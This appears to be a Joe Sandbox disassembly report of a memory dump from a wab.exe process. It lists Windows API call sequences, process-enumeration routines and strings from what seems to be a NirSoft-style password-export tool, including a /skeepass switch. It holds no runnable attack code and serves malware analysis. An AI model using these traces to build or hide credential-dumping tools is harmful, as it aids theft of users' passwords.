                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1010922700-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                                                          • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                                                                                                          • malloc.MSVCRT ref: 004186B7
                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                                                                                                                                                                                          • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 004186E0
                                                                                                                                                                                          • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                                                                                                                                                          • malloc.MSVCRT ref: 004186FE
                                                                                                                                                                                          • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 00418716
                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0041872A
                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 00418749
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ??3@$FullNamePath$malloc$Version
                                                                                                                                                                                          • String ID: |A
                                                                                                                                                                                          • API String ID: 4233704886-1717621600
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _wcsicmp
                                                                                                                                                                                          • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                                                                                                                          • API String ID: 2081463915-1959339147
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                                                                                                          • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                                                                                          • API String ID: 2012295524-70141382
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressProc$HandleModule
                                                                                                                                                                                          • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                                                                                                          • API String ID: 667068680-3953557276
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetDC.USER32(00000000), ref: 004121FF
                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                                                                                                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                                                                                                                                                          • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                                                                                                                                                          • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                                                                                                                                                          • SelectObject.GDI32(?,?), ref: 00412251
                                                                                                                                                                                          • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                                                                                                                                                          • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                                                                                                                                                            • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                                                                                                                                                            • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                                                                                                                                                            • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                                                                                                                                                          • SetCursor.USER32(00000000), ref: 004122BC
                                                                                                                                                                                          • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                                                                                                                                                          • memcpy.MSVCRT ref: 0041234D
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1700100422-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 004111E0
                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 004111F6
                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 0041120C
                                                                                                                                                                                          • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                                                                                                                                                          • GetWindowRect.USER32(00000000), ref: 0041124D
                                                                                                                                                                                          • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                                                                                                                                                          • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                                                                                                                                                          • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                                                                                                                                                          • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                                                                                                                                                          • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                                                                                                                                                          • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                                                                                                                                                          • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 552707033-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,0040C255,?,?,*.*,0040C2BF,00000000), ref: 0040C0A4
                                                                                                                                                                                            • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                                                                                                                                                            • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                                                                                                                                                            • Part of subcall function 0040BFF3: memcpy.MSVCRT ref: 0040C024
                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040C11B
                                                                                                                                                                                          • strchr.MSVCRT ref: 0040C140
                                                                                                                                                                                          • strchr.MSVCRT ref: 0040C151
                                                                                                                                                                                          • _strlwr.MSVCRT ref: 0040C15F
                                                                                                                                                                                          • memset.MSVCRT ref: 0040C17A
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
                                                                                                                                                                                          • String ID: 4$h
                                                                                                                                                                                          • API String ID: 4066021378-1856150674
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memset$_snwprintf
                                                                                                                                                                                          • String ID: %%0.%df
                                                                                                                                                                                          • API String ID: 3473751417-763548558
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                                                                                                                                                          • KillTimer.USER32(?,00000041), ref: 004060D7
                                                                                                                                                                                          • KillTimer.USER32(?,00000041), ref: 004060E8
                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 0040610B
                                                                                                                                                                                          • GetParent.USER32(?), ref: 00406136
                                                                                                                                                                                          • SendMessageW.USER32(00000000), ref: 0040613D
                                                                                                                                                                                          • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                                                                                                                                                          • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                                                                                                                                                          • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                                                                                                                                                          • String ID: A
                                                                                                                                                                                          • API String ID: 2892645895-3554254475
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadMenuW.USER32(?,?), ref: 0040D97F
                                                                                                                                                                                            • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                                                                                                                                                                            • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                                                                                                                                                                            • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                                                                                                                                                                            • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                                                                                                                                                                          • DestroyMenu.USER32(00000000), ref: 0040D99D
                                                                                                                                                                                          • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                                                                                                                                                                          • GetDesktopWindow.USER32 ref: 0040D9FD
                                                                                                                                                                                          • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                                                                                                                                                                          • memset.MSVCRT ref: 0040DA23
                                                                                                                                                                                          • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                                                                                                                                                                          • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                                                                                                                                                                          • DestroyWindow.USER32(00000005), ref: 0040DA70
                                                                                                                                                                                            • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                                                                                                                                          • String ID: caption
                                                                                                                                                                                          • API String ID: 973020956-4135340389
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                                                                                                                                                                          • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                                                                                                                                                                          • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                                                                                                                                                                          • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memset$_snwprintf$wcscpy
                                                                                                                                                                                          • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                                                                                                                          • API String ID: 1283228442-2366825230
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • wcschr.MSVCRT ref: 00413972
                                                                                                                                                                                          • wcscpy.MSVCRT ref: 00413982
                                                                                                                                                                                            • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                                                                                                                            • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                                                                                                                            • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                                                                                                                          • wcscpy.MSVCRT ref: 004139D1
                                                                                                                                                                                          • wcscat.MSVCRT ref: 004139DC
                                                                                                                                                                                          • memset.MSVCRT ref: 004139B8
                                                                                                                                                                                            • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                                                                                                                                                                            • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                                                                                                                                                                          • memset.MSVCRT ref: 00413A00
                                                                                                                                                                                          • memcpy.MSVCRT ref: 00413A1B
                                                                                                                                                                                          • wcscat.MSVCRT ref: 00413A27
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                                                                                                                                          • String ID: \systemroot
                                                                                                                                                                                          • API String ID: 4173585201-1821301763
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: wcscpy
                                                                                                                                                                                          • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                                                                                                                                          • API String ID: 1284135714-318151290
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                                                                                                                                                          • String ID: 0$6
                                                                                                                                                                                          • API String ID: 4066108131-3849865405
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.MSVCRT ref: 004082EF
                                                                                                                                                                                            • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                                                          • memset.MSVCRT ref: 00408362
                                                                                                                                                                                          • memset.MSVCRT ref: 00408377
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memset$ByteCharMultiWide
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 290601579-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcpy$memchrmemset
                                                                                                                                                                                          • String ID: PD$PD
                                                                                                                                                                                          • API String ID: 1581201632-2312785699
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                                                                                                                                                                                          • GetSystemMetrics.USER32(00000010), ref: 00409F61
                                                                                                                                                                                          • GetDC.USER32(00000000), ref: 00409F6E
                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                                                                                                                                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 00409FA0
                                                                                                                                                                                          • GetParent.USER32(?), ref: 00409FA5
                                                                                                                                                                                          • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                                                                                                                                                                                          • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2163313125-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ??3@$wcslen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 239872665-3916222277
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcpywcslen$_snwprintfmemset
                                                                                                                                                                                          • String ID: %s (%s)$YV@
                                                                                                                                                                                          • API String ID: 3979103747-598926743
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                                                                                                                          • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Library$AddressFreeLoadMessageProc
                                                                                                                                                                                          • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                                                                                                          • API String ID: 2780580303-317687271
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                                                                                                                                                                                          • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                                                                                                                                                                                          • wcslen.MSVCRT ref: 0040A6B1
                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0040A6C1
                                                                                                                                                                                          • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0040A6DB
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                                                                                                                          • String ID: Unknown Error$netmsg.dll
                                                                                                                                                                                          • API String ID: 2767993716-572158859
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0040DAFB
                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0040DB0B
                                                                                                                                                                                          • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                                                                                                                                                                            • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                                                                                                                                          • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                                                                                                          • API String ID: 3176057301-2039793938
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • unable to open database: %s, xrefs: 0042F84E
                                                                                                                                                                                          • cannot ATTACH database within transaction, xrefs: 0042F663
                                                                                                                                                                                          • too many attached databases - max %d, xrefs: 0042F64D
                                                                                                                                                                                          • out of memory, xrefs: 0042F865
                                                                                                                                                                                          • database %s is already in use, xrefs: 0042F6C5
